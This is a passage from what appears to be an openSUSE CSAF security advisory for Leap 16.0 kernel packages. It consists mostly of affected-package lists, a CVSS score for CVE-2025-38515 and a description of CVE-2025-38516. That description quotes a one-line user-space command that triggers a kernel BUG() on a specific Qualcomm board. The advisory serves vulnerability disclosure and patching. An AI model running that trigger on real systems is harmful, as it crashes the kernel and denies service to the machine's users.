"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38515"
},
{
"cve": "CVE-2025-38516",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38516"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: qcom: msm: mark certain pins as invalid for interrupts\n\nOn some platforms, the UFS-reset pin has no interrupt logic in TLMM but\nis nevertheless registered as a GPIO in the kernel. This enables the\nuser-space to trigger a BUG() in the pinctrl-msm driver by running, for\nexample: `gpiomon -c 0 113` on RB2.\n\nThe exact culprit is requesting pins whose intr_detection_width setting\nis not 1 or 2 for interrupts. This hits a BUG() in\nmsm_gpio_irq_set_type(). Potentially crashing the kernel due to an\ninvalid request from user-space is not optimal, so let\u0027s go through the\npins and mark those that would fail the check as invalid for the irq chip\nas we should not even register them as available irqs.\n\nThis function can be extended if we determine that there are more\ncorner-cases like this.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
